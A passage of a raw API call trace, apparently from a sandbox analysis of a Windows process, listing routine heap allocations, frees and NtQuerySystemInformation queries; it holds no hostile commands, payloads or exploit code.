[0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8601a0 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d803d00 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d8ed0 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.413] GetProcessHeap () returned 0x2026c630000 [0210.413] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794810 | out: hHeap=0x2026c630000) returned 1 [0210.414] GetProcessHeap () returned 0x2026c630000 [0210.414] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63bb40 | out: hHeap=0x2026c630000) returned 1 [0210.414] GetProcessHeap () returned 0x2026c630000 [0210.414] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794630 | out: hHeap=0x2026c630000) returned 1 [0210.414] GetProcessHeap () returned 0x2026c630000 [0210.414] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d802de0 | out: hHeap=0x2026c630000) returned 1 [0210.414] GetProcessHeap () returned 0x2026c630000 [0210.414] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d8eb0 | out: hHeap=0x2026c630000) returned 1 [0210.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.415] GetProcessHeap () returned 0x2026c630000 [0210.415] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d803d00 [0210.415] GetProcessHeap () returned 0x2026c630000 [0210.415] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d8eb0 [0210.415] GetProcessHeap () returned 0x2026c630000 [0210.415] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x122) returned 0x2026c63b680 [0210.416] GetProcessHeap () returned 0x2026c630000 [0210.416] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026d319ff0 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882df0 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c6d9830 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8050f0 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9050 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d20cc50 | out: hHeap=0x2026c630000) returned 1 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1ec) returned 0x2026c6a75e0 [0210.417] GetProcessHeap () returned 0x2026c630000 [0210.417] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x2f4) returned 0x2026d285b70 [0210.418] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfeb48 | out: phModule=0xc751dfeb48*=0x7ffcea380000) returned 1 [0210.418] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.418] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfec70, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfec70, ResultLength=0x0) returned 0x0 [0210.420] GetProcessHeap () returned 0x2026c630000 [0210.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8822b0 [0210.420] GetProcessHeap () returned 0x2026c630000 [0210.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x80) returned 0x2026d7d1040 [0210.420] GetProcessHeap () returned 0x2026c630000 [0210.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8043e0 [0210.420] GetProcessHeap () returned 0x2026c630000 [0210.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9110 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x6c) returned 0x2026d7bcb20 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d319ff0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8050f0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9050 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6a75e0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d285b70 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7d1040 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8043e0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9110 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.421] GetProcessHeap () returned 0x2026c630000 [0210.421] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7bd020 | out: hHeap=0x2026c630000) returned 1 [0210.422] GetProcessHeap () returned 0x2026c630000 [0210.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63b680 | out: hHeap=0x2026c630000) returned 1 [0210.422] GetProcessHeap () returned 0x2026c630000 [0210.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7bcb20 | out: hHeap=0x2026c630000) returned 1 [0210.422] GetProcessHeap () returned 0x2026c630000 [0210.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d803d00 | out: hHeap=0x2026c630000) returned 1 [0210.423] GetProcessHeap () returned 0x2026c630000 [0210.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d8eb0 | out: hHeap=0x2026c630000) returned 1 [0210.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.426] GetProcessHeap () returned 0x2026c630000 [0210.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d803780 [0210.426] GetProcessHeap () returned 0x2026c630000 [0210.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9110 [0210.426] GetProcessHeap () returned 0x2026c630000 [0210.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c692330 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c692440 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8829b0 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d732ea0 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8038e0 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9000 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732d80 | out: hHeap=0x2026c630000) returned 1 [0210.428] GetProcessHeap () returned 0x2026c630000 [0210.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026c6d9830 [0210.429] GetProcessHeap () returned 0x2026c630000 [0210.429] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692770 [0210.429] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfebc8 | out: phModule=0xc751dfebc8*=0x7ffcea380000) returned 1 [0210.429] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.429] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfecf0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfecf0, ResultLength=0x0) returned 0x0 [0210.429] GetProcessHeap () returned 0x2026c630000 [0210.429] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882df0 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d794630 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804f90 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d91a0 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d8822b0 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692440 | out: hHeap=0x2026c630000) returned 1 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732ea0 | out: hHeap=0x2026c630000) returned 1 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8038e0 | out: hHeap=0x2026c630000) returned 1 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9000 | out: hHeap=0x2026c630000) returned 1 [0210.430] GetProcessHeap () returned 0x2026c630000 [0210.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8829b0 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c6d9830 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692770 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794630 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804f90 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d91a0 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.431] GetProcessHeap () returned 0x2026c630000 [0210.431] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d794450 | out: hHeap=0x2026c630000) returned 1 [0210.432] GetProcessHeap () returned 0x2026c630000 [0210.432] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692330 | out: hHeap=0x2026c630000) returned 1 [0210.432] GetProcessHeap () returned 0x2026c630000 [0210.432] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.432] GetProcessHeap () returned 0x2026c630000 [0210.432] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d803780 | out: hHeap=0x2026c630000) returned 1 [0210.432] GetProcessHeap () returned 0x2026c630000 [0210.432] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9110 | out: hHeap=0x2026c630000) returned 1 [0210.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.434] GetProcessHeap () returned 0x2026c630000 [0210.434] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804d80 [0210.434] GetProcessHeap () returned 0x2026c630000 [0210.434] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9000 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xb8) returned 0x2026d731670 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc0) returned 0x2026d315160 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8829b0 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc8) returned 0x2026d3153d0 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805300 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9150 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d315d90 | out: hHeap=0x2026c630000) returned 1 [0210.435] GetProcessHeap () returned 0x2026c630000 [0210.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x17c) returned 0x2026d20cc50 [0210.436] GetProcessHeap () returned 0x2026c630000 [0210.436] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xdc) returned 0x2026c63c710 [0210.436] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfecf0 | out: phModule=0xc751dfecf0*=0x7ffcea380000) returned 1 [0210.436] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.436] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfeda8, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfeda8, ResultLength=0x0) returned 0x0 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8822b0 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x28) returned 0x2026d874080 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805460 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d8eb0 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x14) returned 0x2026d71b4e0 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d315160 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d3153d0 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805300 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9150 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8829b0 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d20cc50 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63c710 | out: hHeap=0x2026c630000) returned 1 [0210.437] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d874080 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805460 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d8eb0 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8822b0 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d873e70 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d731670 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d71b4e0 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804d80 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9000 | out: hHeap=0x2026c630000) returned 1 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805460 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d90b0 [0210.438] GetProcessHeap () returned 0x2026c630000 [0210.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc638) returned 0x2026d8312e0 [0210.440] GetProcessHeap () returned 0x2026c630000 [0210.440] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc640) returned 0x2026d755e70 [0210.442] GetProcessHeap () returned 0x2026c630000 [0210.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d882df0 [0210.442] GetProcessHeap () returned 0x2026c630000 [0210.443] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc648) returned 0x2026d1dcdd0 [0210.444] GetProcessHeap () returned 0x2026c630000 [0210.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804b70 [0210.444] GetProcessHeap () returned 0x2026c630000 [0210.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d91f0 [0210.444] GetProcessHeap () returned 0x2026c630000 [0210.444] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7624c0 | out: hHeap=0x2026c630000) returned 1 [0210.444] GetProcessHeap () returned 0x2026c630000 [0210.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc6fc) returned 0x2026d7624c0 [0210.444] GetProcessHeap () returned 0x2026c630000 [0210.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xcc) returned 0x2026d424050 [0210.444] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfed70 | out: phModule=0xc751dfed70*=0x7ffcea380000) returned 1 [0210.445] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0210.445] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfedc8, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfedc8, ResultLength=0x0) returned 0x0 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8829b0 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x18) returned 0x2026d71b4e0 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d804d80 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9050 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d9060 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.462] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d755e70 | out: hHeap=0x2026c630000) returned 1 [0210.462] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d1dcdd0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804b70 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d91f0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d882df0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7624c0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d424050 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d71b4e0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d804d80 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9050 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8829b0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d71b240 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8312e0 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d9060 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805460 | out: hHeap=0x2026c630000) returned 1 [0210.463] GetProcessHeap () returned 0x2026c630000 [0210.463] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d90b0 | out: hHeap=0x2026c630000) returned 1 [0210.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe830, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe830, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe830, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x50, ResultLength=0x0) [0210.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x50, ResultLength=0x0) [0210.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe650, Length=0x38, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.467] NtQuerySystemInformation (SystemInformationClass=0xb9, 